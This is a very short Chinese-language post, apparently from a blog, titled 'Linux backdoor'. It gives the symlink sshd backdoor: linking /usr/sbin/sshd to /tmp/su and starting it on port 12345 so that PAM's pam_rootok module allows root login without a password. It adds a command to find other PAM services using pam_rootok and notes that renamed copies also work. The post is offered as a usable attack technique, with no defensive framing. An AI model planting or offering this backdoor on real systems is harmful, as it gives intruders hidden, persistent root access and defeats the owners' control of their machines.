linux后门

软链接后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345

ssh启用了PAM,用到了pam_rootok模块

同样还具有pam_rootok模块的文件还有

find /etc/pam.d/ | xargs grep "pam_rootok"

同样,你复制改名了,软连接调用了也可以生效.

你可能感兴趣的:(linux后门)